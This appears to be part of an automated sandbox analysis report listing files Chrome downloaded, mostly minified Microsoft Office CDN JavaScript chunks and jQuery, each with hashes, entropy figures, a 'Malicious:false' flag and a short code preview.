                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1873)
                              Category:downloaded
                              Size (bytes):1878
                              Entropy (8bit):4.741252420675682
                              Encrypted:false
                              SSDEEP:
                              MD5:337F5DBC3E8F357E6B8634A8772582C6
                              SHA1:C74D4DE0AB81F3147FBB891C6ADCA539DDB7E4D6
                              SHA-256:B91D50CF19CBB72816DB58BCED7A154AFC5E482B363618BDC77BFC392C000A34
                              SHA-512:F63F8EB30427D43372DF684F5B0D0952BB9E32B06F3CAD142A1EB2E32F7423EB24328D02BF7596D095E45A094BD200D0F4A20F2614C58472452597FB7086C678
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/en-us/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{7763:e=>{e.exports=JSON.parse('{"introPageHeaderText":"Add Microsoft Teams","selectPageHeaderText":"Pin resources as tabs in Teams","introPageDescription1":"Bring resources from this site into Teams for real-time collaboration all in one place. ","introPageSecondHeader":"Teams makes it easier to:","introPagePoint1":"Chat with your colleagues","introPagePoint2":"Coordinate online meetings with partners","introPagePoint3":"Work together on shared content","selectPageDescription":"Add pages, lists, and document libraries as tabs in Teams to make shared resources readily available for collaborators. Once in Teams, resources in tabs can be added, removed, or reordered.","continueButtonText":"Continue","addTeamButtonText":"Add Teams","cancelButtonText":"Cancel","recommended":"Recommended","pages":"Pages","lists":"Lists","doclibs":"Document Libraries","creatingTeam":"Creating your Team","addResourc
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8330)
                              Category:downloaded
                              Size (bytes):8717
                              Entropy (8bit):5.4949840905388285
                              Encrypted:false
                              SSDEEP:
                              MD5:A0F57D741AA764D28476ABE8F7CE240C
                              SHA1:41FE814EB7A9269DF7621BB1F3B949474B8B77F0
                              SHA-256:2D13BBE98A93C143A5CFD6619D129062E7F247DA5D05DA3754EDBAE7D85A1A12
                              SHA-512:F5FA7580F93BCFE26C1A950E1589FEAFC8993FD8594CEF655FE9D67E1D270E73A9487B46E04687CAD93757A7E7077D094FFCB3AE5C098AC250512428F8332109
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/18.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[18],{659:(e,t,n)=>{n.r(t),n.d(t,{NO_ROOM_TO_PASTE:()=>L,adaptSelectionToRowColRanges:()=>P,createPlaceholderItems:()=>H,getFieldValueToCopy:()=>B,handleCopy:()=>M,handleCut:()=>A,handleFieldPaste:()=>N,handlePaste:()=>k,handlePasteForNewRow:()=>E,multiValSeparator:()=>y,pasteTargetListRootRef:()=>D,serializedFieldSeparator:()=>v,updateBorder:()=>j});var a=n("tslib_102"),i=n(52),r=n("odsp.util_578"),o=n(3),s=n(290),c=n(24),d=n(317),l=n(2067),u=n(20),f=n(40),p=n(451),m=n(642),_=n(1550),h=n(573),b=n(12),g=n(2),v=",#",y=";",S="&#09;",D={},I=(0,c.b)(),x=I.SPListHelpers,C=I.DateHelper,O=(0,c.b)().Telemetry,w=r.HW.isActivated("35A10E4A-DE94-487D-819F-B997DE587702");function E(e,t,n,i,r,c,d,l,u,f,p){return(0,a.Zd)(this,void 0,void 0,function(){var m,_,h,b;return(0,a.qr)(this,function(a){switch(a.label){case 0:return O.Engagement.logData({name:"SpartanList.AddNewRowCreation.CopyPaste"}),[4,(0,s.a)()];case 1:if(m=a.sen
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (48756)
                              Category:downloaded
                              Size (bytes):305411
                              Entropy (8bit):5.403069932879266
                              Encrypted:false
                              SSDEEP:
                              MD5:511A0B1B2FD7433C068B45A072AD6C8B
                              SHA1:B37C73B85C73F5F11FC8D86E4E1B94A6993B1ABB
                              SHA-256:BFFB97E4DF1A232B9505A45BC088961A3BDE6FE81B2B62D42C6153DC36C01840
                              SHA-512:A915419094533984B7390F4720EB8D31AD32AF0A880B8692BDE31D1D0975D42860A8C1968B3E818CFC6693FCED2B2334F56268A8429FB30FD3EDA8ED1E1ECADA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/257.js
                              Preview:/*! For license information please see 257.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[257],{797:(e,t,n)=>{n.d(t,{a:()=>ne});var a=n(798),i=n("react-lib"),r=n.n(i),o=n("react-dom-lib"),s={childContextTypes:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},c={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},d=Object.defineProperty,l=Object.getOwnPropertyNames,u=Object.getOwnPropertySymbols,f=Object.getOwnPropertyDescriptor,p=Object.getPrototypeOf,m=p&&p(Object),_=function e(t,n,a){if("string"!=typeof n){if(m){var i=p(n);i&&i!==m&&e(t,i,a)}var r=l(n);u&&(r=r.concat(u(n)));for(var o=0;o<r.length;++o){var _=r[o];if(!(s[_]||c[_]||a&&a[_])){var h=f(n,_);try{d(t,_,h)}catch(e){}}}return t}return t},h="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.co
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (24831)
                              Category:downloaded
                              Size (bytes):26227
                              Entropy (8bit):5.427320547592864
                              Encrypted:false
                              SSDEEP:
                              MD5:A9B5258C5E49C13419629240D57656E4
                              SHA1:DD7445F84A1BA08FE75CB839DF514F9390347D2B
                              SHA-256:F392248E32EEE1D65749434322513BA497CEFC2C3E348855FE2301A748A18138
                              SHA-512:AE2C9056B1A26CAD9B7869C0E877B6D5C68AF914914A95DA6098A8F52273F2E476D0F9F1C7599D9835D2987E64152ACEFC51D5A19D3CF2E9658C7C29E7ECEC4C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/29636.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[29636],{829636:(e,t,n)=>{n.d(t,{z:()=>c});var a=n(408156),i=n(604721),r=n(960924),o=n(747393),s=n(402904);const c=a.forwardRef((e,t)=>{const n=(0,r.E)(e,t);return(0,o.e)(n),(0,s.mj)("useButtonStyles_unstable")(n),(0,i.z)(n)});c.displayName="Button"}.,604721:(e,t,n)=>{n.d(t,{z:()=>r});var a=n(878542),i=n(218777);const r=e=>{(0,i.a)(e);const{iconOnly:t,iconPosition:n}=e;return(0,a.wX)(e.root,{children:["after"!==n&&e.icon&&(0,a.vZ)(e.icon,{}),!t&&e.root.children,"after"===n&&e.icon&&(0,a.vZ)(e.icon,{})]})}}.,960924:(e,t,n)=>{n.d(t,{E:()=>s}),n(408156);var a=n(374254),i=n(235094),r=n(336505),o=n(390007);const s=(e,t)=>{const{size:n}=(0,o.y)(),{appearance:s="secondary",as:c="button",disabled:d=!1,disabledFocusable:l=!1,icon:u,iconPosition:f="before",shape:p="rounded",size:m=(null!=n?n:"medium")}=e,_=i.dt(u,{elementType:"span"});return{appearance:s,disabled:d,disabledFocusable:l,iconPosition:f,sh
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2439)
                              Category:downloaded
                              Size (bytes):3519
                              Entropy (8bit):5.1805817016723505
                              Encrypted:false
                              SSDEEP:
                              MD5:5827779F5D65E9296C0FAF1D864D7A79
                              SHA1:3500ABBB5733DE587B840A605A979450B53CE581
                              SHA-256:654BDE04FBDCB5BCC1342D856F58A6EC6683B99CC8AE077027971AFF8585A474
                              SHA-512:1E47DF5E8E0F6C6F63B24D54B6E85364D63BF6919151D76D5228FF6F649B0BABBAD77C616C6EA9EABC6175C2B2D95B06C759C23DDAEAB4A5DE70AE1ED931A9D0
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/576.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[576],{2771:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e[e.View=0]="View",e[e.Edit=1]="Edit",e[e.Extract=2]="Extract",e[e.Esign=3]="Esign"}(a||(a={}))}.,4963:function(e,t,n){n.r(t),n.d(t,{LaunchPdfExtractionAction:function(){return l}});var a=n("tslib_102"),i=n(2771),r=n(23),o=n(14),s=n(2095),c=n(2100),d=n(4681),l=function(e){function t(t,n){void 0===n&&(n={});var a=e.call(this,t,n)||this;return a.name="LaunchPdfExtractionAction",a._itemSelectionHelper=new(a.child(c.a))({overrideItem:t.item}),a._pdfViewerHelper=t.pdfViewerHelper,a.showHintStar=t.showHintStar,(0,d.a)(),a}return(0,a.XJ)(t,e),t.prototype.onIsAvailable=function(){var e=this._itemSelectionHelper.firstItem();return!!e&&this._pdfViewerHelper.isPdfExtractAvailable(e)&&this._pdfViewerHelper.isPdfEditable(e)},t.prototype.onExecute=function(){return this._pdfViewerHelper.state.currentMode(i.a.Extract),this.showHintStar.peek()&&this
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5524)
                              Category:downloaded
                              Size (bytes):7692
                              Entropy (8bit):5.33070857414272
                              Encrypted:false
                              SSDEEP:
                              MD5:7AD308833622412386FB3B19E3CB89E2
                              SHA1:0618232F6224A1C5C357031B4934B2E4654A8E07
                              SHA-256:F59463920D6338A1CE5A7CC26A6CDDF1C9550F046EF56E0923693953458F28E5
                              SHA-512:3C85E57E0AEE03DF50E7DC635E39BE0294580C898B574B5234CC9B17573B607A35C13C9BA79301CEEFFB89D1E3689D7BEAB8967293D1E6E7D1D037986DD6A42B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/189.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[189],{1857:(e,t,n)=>{n.r(t),n.d(t,{GuidedTour:()=>p});var a=n("react-lib"),i=n(270),r=n("react-dom-lib"),o=n("fui.lco_35"),s=n("fui.lcoms_307"),c=n(256);(0,n("fui.util_150").pZ)([{rawString:".teachingBubbleCallout_65bacb71 .ms-TeachingBubble-bodycontent{padding:54px 24px 24px 24px}.teachingBubbleCallout_65bacb71 .ms-TeachingBubble-header:not(:last-child){margin-bottom:6px}.teachingBubbleCallout_65bacb71 .ms-TeachingBubble-footer{width:100%}.teachingBubbleCallout_65bacb71 .ms-TeachingBubble-body{margin-bottom:28px}.footer_65bacb71{display:flex;justify-content:space-between;flex:1 1 auto}.pagination_65bacb71{position:absolute;top:24px}[dir=ltr] .pagination_65bacb71{left:24px}[dir=rtl] .pagination_65bacb71{right:24px}.actionButtonContainer_65bacb71{display:flex}.backButton_65bacb71,.nextButton_65bacb71{border-color:transparent;color:"},{theme:"white",defaultValue:"#fff"},{rawString:";background-color:transparent
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (7672)
                              Category:downloaded
                              Size (bytes):58169
                              Entropy (8bit):4.915867961078494
                              Encrypted:false
                              SSDEEP:
                              MD5:10A12F1D8785253820FA9B61C3BDAC54
                              SHA1:DF6CA5ED143BF246B42BAAD80D75B15B7941C1AE
                              SHA-256:3D329118F8AB1F16BC2AED4DD9666D64D0351BE5E26880E4EB512CD193D80450
                              SHA-512:67BAF699B9C22F9DB3DD81D301F5190F56BE8E4768D32AF1EDC404AFDCC9C70BBB5902B4FB493B3B4F06098F344DE42A7EEE5A1CA1FE35761D25695F1307A380
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/es/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{428:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,460:e=>{e.exports=JSON.parse('{"a":"A source with id \
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3636)
                              Category:downloaded
                              Size (bytes):3641
                              Entropy (8bit):5.372114777736053
                              Encrypted:false
                              SSDEEP:
                              MD5:7329535B9DF5744B91413158F3038317
                              SHA1:5EABAC5073387BBCABBF4B2C4A078AC89D162E40
                              SHA-256:9821D86D70849D98CAB25B190717A3E724D566C3C515084D3BA3B68BC29CDA66
                              SHA-512:276B946E0A9B39BDBA643AD988FECA631049E44ED65087B7DF46E44565AB7872DCBC13A5A0996DE44C0F7DE666423588C9E72071486BFCD53FF8FA47EBA439AE
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/3.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[3],{661:(e,t,n)=>{n.r(t),n.d(t,{appendNewRowToNewRowPageIfNecessary:()=>f,displayNextNewRowAndMoveFocusDown:()=>p,findDefaultValues:()=>v,findDefaultValuesFormatted:()=>g,insertOrReplaceItemInQueue:()=>l,isItemEditedByUser:()=>b,renderErrorTextForRequiredFields:()=>m,rerenderNewRowPageWithNextNewRowIfNecessary:()=>u,shouldLookForFormattedDefaultValues:()=>y});var a=n("tslib_102"),i=n(52),r=n(3),o=n(1),s=n(2);(0,n("fui.util_150").pZ)([{rawString:".requiredFieldNewRowErrorMessage_cd906843{color:var(--ms-semanticColors-errorIcon);text-align:left;display:flex;font-style:italic;align-items:center}"}]);var c=n(587),d=n("odsp.util_578").HW.isActivated("C0C71434-6482-40BA-B39A-1D3E72E7F363");function l(e,t,n){var i;-1===(i=e.current.map(function(e){return n(e)}).indexOf(n(t)))?1!==_(t).length&&e.current.push(t):e.current[i]=d?t:(0,a.W_)((0,a.W_)({},e.current[i]),t)}function u(e,t,n,a){h(e,0,n,a),null==t||t.rerenderNe
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (32030)
                              Category:downloaded
                              Size (bytes):86709
                              Entropy (8bit):5.367391365596119
                              Encrypted:false
                              SSDEEP:
                              MD5:E071ABDA8FE61194711CFC2AB99FE104
                              SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                              SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                              SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                              Malicious:false
                              Reputation:unknown
                              URL:https://code.jquery.com/jquery-3.1.1.min.js
                              Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (5850)
                              Category:downloaded
                              Size (bytes):141566
                              Entropy (8bit):5.02549474466727
                              Encrypted:false
                              SSDEEP:
                              MD5:BD3A22B5E535DA61F04F4908BDA02FC6
                              SHA1:705A1A45C7C556D235BB76A2543342E8EEB249E5
                              SHA-256:2FD092797D711F0380790432A4BDF936125DB4CAE54573D93E8BAEAAD4BFF561
                              SHA-512:89ED662C9223B4555730CFD586CFF81C6B665C4C5A7F6D864AD0551CDD94D817B3241E628881A8478AB89DE788460AF236C13E84ECFCE993240EBAF00F7696D7
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/es/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{2266:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,2455:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (22062)
                              Category:downloaded
                              Size (bytes):72548
                              Entropy (8bit):5.086250337639077
                              Encrypted:false
                              SSDEEP:
                              MD5:6AE0955A8B23D0DEA515AD1EF18AE2D7
                              SHA1:082C4512E9F7C5DDC9DC907B831478D1CA9ED648
                              SHA-256:E0DDDA5DE42F672D120D6CE8D27D5EA4A7D2C578E81C0AF08E0D70C064414A5D
                              SHA-512:252A9AD909A044D6A2E4CFB642724121C1056747F88ED9C107E2A1CEC186530C6122619FD2213154527AC94131182B92FCCC7292A66A0BD393548C7CE760CFD5
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/de/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{788:e=>{e.exports=JSON.parse('{"a":"Ein Problem ist aufgetreten","c":"Versuchen Sie, die Seite zu aktualisieren.","b":"Es ist ein Problem aufgetreten, und wir konnten die anzuzeigende Seite nicht abrufen."}')}.,1640:e=>{e.exports=JSON.parse('{"a":"Im Plastischen Reader .ffnen"}')}.,277:e=>{e.exports=JSON.parse('{"b":"Verkn.pfung zu .Meine Dateien. hinzuf.gen","d":"Verkn.pfung zu OneDrive hinzuf.gen","n":"Entfernen","p":"Verkn.pfung aus \\u0022Meine Dateien\\u0022 entfernen","y":"Aus freigegebener Liste entfernen","a":"Hinzuf.gen einer Verkn.pfung zu diesem Ordner in .Meine Dateien.","o":"Entfernen der Verkn.pfung zu diesem Ordner aus .Meine Dateien.","c":"Hinzuf.gen einer Verkn.pfung zu diesem Ordner in OneDrive","m":"Entfernen der ausgew.hlten Verkn.pfung von diesem Speicherort","f":"Verkn.pfung zu Alben hinzuf.gen","e":"Hinzuf.gen einer Verkn.pfung zu diesem fre
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3778)
                              Category:downloaded
                              Size (bytes):16114
                              Entropy (8bit):5.316812891068968
                              Encrypted:false
                              SSDEEP:
                              MD5:A9CD00E01E09E4510A7DC046E240C678
                              SHA1:2C4677CC387EC1B269DA80A0A2D0E48DBF839A69
                              SHA-256:D54D9B3AC22157BBA95A1FCDBD99C7B6EAD4E1E96B8D6D07944E66C630157154
                              SHA-512:8639A1BEEA039EDF5EE4D9B856D25C28EACCEEBEC44D165916623C752D6987207E519EDACF85DC83B73738A067F91C7FE364B22F141AEC780BE6A6002DC44281
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/onePlayer.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[11657],{561499:(e,t,n)=>{n.r(t),n.d(t,{createOnePlayer:()=>l,loadMtcManager:()=>s.s,onePlayerVersion:()=>r._,prefetchManifest:()=>c.g,prefetchManifestLite:()=>c.H,prewarmResources:()=>o.G,stringToMediaVisibility:()=>d.r});var a=n(782849),i=n(478099),r=n(46227),o=n(139694),s=n(875961),c=n(742245),d=n(694991);function l(e){return new a.G(e,i.hl)}}.,636221:(e,t,n)=>{n.r(t),n.d(t,{createIc3AmsOnePlayer:()=>v,createOdspOnePlayer:()=>g,createOdspOnePlayerWithoutPlugins:()=>b,loadMtcManager:()=>_.s,onePlayerVersion:()=>p._,prefetchManifest:()=>h.g,prewarmResources:()=>m.G});var a=n(782849),i=n(295610),r=n(741222),o=n(422058),s=n(265889),c=n(82999),d={mediaType:"video"},l=function(){function e(e,t){this.options=e,this.telemetryContext=t,this._itemTitle=new c.m(void 0),this._captionsAvailable=new c.m(void 0),this._audioFiles=new c.m(void 0),this.loadDataForPhase=function(e){return Promise.resolve()};
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65477)
                              Category:downloaded
                              Size (bytes):2621132
                              Entropy (8bit):5.438419823368319
                              Encrypted:false
                              SSDEEP:
                              MD5:940C739B532147D9493F2D8FC1F6BD48
                              SHA1:B7EAD66FD52E1E9C23318B162ADD9B3ED7F5F046
                              SHA-256:45550F824A099DBCDB0EBA8FD810638EF76584010807B4A77012BF30A8A5BA19
                              SHA-512:93375F9B530EF2911F89C39C7C262269F5A5C81024E9D2E2456D556E9385A09755FCB4E7DF9E8F828BCC6819712C5775AAC1ED171882C3BC9014FDDB4BC5C38D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-meta-os/2.js
                              Preview:/*! For license information please see 2.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[2],Array(224).concat([(e,t,n)=>{"use strict";n.r(t);var a=n(33),i=n(5244);(0,a.d)("ScriptStart"),(0,i.b)();var r=n("react-lib"),o=n.n(r),s=n("react-dom-lib");window.React=r,window.ReactDOM=s;var c=n(104);(0,c.c)(JSON.parse("[]"));var d,l,u,f=n(0),p=n(133),m=n(1450),_=n(5283),h=n(247),b=n(5275),g=n(5253),v=n(15),y=n(5330),S=n(5262),D=n(5287),I=n(73),x=n(48),C=n(17),O=n(1752),w=n(5286),E=n(259),A=n(460),L=n(419),k=n(22),M=n(306),P=n(5311),T=n(5278),U=n(1757),F=n(5276),H=n(5252),R=n(5303),N=n(1221),B=n(396),j=n(500),V=n(1457),z=n(1083),G=n(5332),K=n(5331),W=n(2292),q=n(12),Q=n(2293),Y=n(622),J=n(5284),X=n(3),Z=n(9),$=!("dev"!==(null===(d=window.Flight)||void 0===d?void 0:d.version)&&!(null===(l=window.Flight)||void 0===l?void 0:l.devMode)),ee=(null===(u=null===window||void 0===window?void 0:window.document)||void 0===u||u.cookie.indexOf("srr"),window.FilesConfig&&win
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2723)
                              Category:downloaded
                              Size (bytes):2851
                              Entropy (8bit):5.433839742076419
                              Encrypted:false
                              SSDEEP:
                              MD5:76657795518771A3BAE7C6999F04BBF0
                              SHA1:FB18AEFADBBE937EB11A184B69DBAF45A8B954E3
                              SHA-256:2561E0FDC378F985837190F8441CDD3CD415896B84507A575637F36A738CCDD3
                              SHA-512:D479C60738A3C4D837FF5BAF99C30603FA8BFDA09B6B03658D2A556AF9CB9B67AC9635F50FDA4E077E543CBFE59B646D5419F7D6F9979BFF83E919CA80D3A7E1
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/30.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[30],{725:(e,t,n)=>{n.r(t),n.d(t,{EmptyListPlaceholder:()=>b});var a=n(1),i=n(2326),r=n("fui.util_150");(0,r.pZ)([{rawString:".placeholderImage_213626a4{width:212px;height:168px}.placeHolderImageExperiment_213626a4{width:256px;height:256px}.positionAtCenter_213626a4{position:absolute;top:50%;transform:translate(-50%,-50%);display:flex;justify-content:center;align-items:center;flex-direction:column}html[dir=ltr] .positionAtCenter_213626a4{left:50%}html[dir=rtl] .positionAtCenter_213626a4{right:50%}.emptyListSubTitle_213626a4{color:"},{theme:"neutralSecondary",defaultValue:"#605e5c"},{rawString:"}.emptyListTitle_213626a4{font-size:"},{theme:"xLargeFontSize",defaultValue:"20px"},{rawString:";font-weight:"},{theme:"xLargeFontWeight",defaultValue:"600"},{rawString:";font-weight:600;color:"},{theme:"neutralPrimary",defaultValue:"#323130"},{rawString:";margin-top:8px}"}]);const o="positionAtCenter_213626a4",s="emptyL
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:downloaded
                              Size (bytes):305287
                              Entropy (8bit):5.238038846641561
                              Encrypted:false
                              SSDEEP:
                              MD5:E0A4EC4431511C431BA9ACF5FEF5FEDA
                              SHA1:9C46075D158D420959325FBC8EF13D3B10D6B83D
                              SHA-256:C8C0FE2FD16F0B9CA485644C28A1FC1B0DCD48F1002213EDF6EB81F1CDFE6519
                              SHA-512:8AD0C7E87DD38A7B6AC6FE914DC030D465382FAAE01ABA35F5D130C36329744062BEB4D80B04AC73610D40FD52DD2A8E6E0464BAA275C2F1B0125DD0C7DE59ED
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/28247.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[28247],{913154:(e,t,n)=>{n.d(t,{X:()=>r});var a=n(295610),i=[(0,a.__assign)({1995:{defaultValue:!1,type:"boolean",friendlyName:"OnePlayer",featureFlagClassification:"MajorFeature"},isPlaybackSpeedNonTMRFilesEnabled:{defaultValue:!1,type:"boolean",friendlyName:"OnePlayerPlaybackSpeedNonTMRFilesEnabled",featureFlagClassification:"MajorFeature"},IsStreamPopOutIconEnabled:{defaultValue:!1,type:"boolean",friendlyName:"IsStreamPopOutIconEnabled",featureFlagClassification:"MinorFeature"},isShareDialogV2ForSharePluginEnabled:{defaultValue:!0,type:"boolean",friendlyName:"isShareDialogV2ForSharePluginEnabled",featureFlagClassification:"Fix"},isPostPlaybackDataLayerUndefinedFixEnabled:{defaultValue:!0,type:"boolean",friendlyName:"isPostPlaybackDataLayerUndefinedFixEnabled",featureFlagClassification:"Fix"},isMediaDurationsInSecondsFixEnabled:{defaultValue:!0,type:"boolean",friendlyName:"isMediaDurations
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (45712)
                              Category:downloaded
                              Size (bytes):49991
                              Entropy (8bit):5.6341867588171395
                              Encrypted:false
                              SSDEEP:
                              MD5:55A2FAA645779A00532C5C4ED1EC302F
                              SHA1:DA25AF639AFD6DC307DE4BD888F9A8D47CF882E2
                              SHA-256:BF0FB167C8090D008AEA741CFF6CC79C6F074FBACF884378965DF890BDADAC90
                              SHA-512:AF46AF3BCFB6790E19AA22AC51094DA06998EEDDA77C5EF1FEBCE2C23C53AB59AC1F58A6BF383A50FAF1820321533F6525FF08B9A878662D55BFABC4A0AC4A55
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/181.js
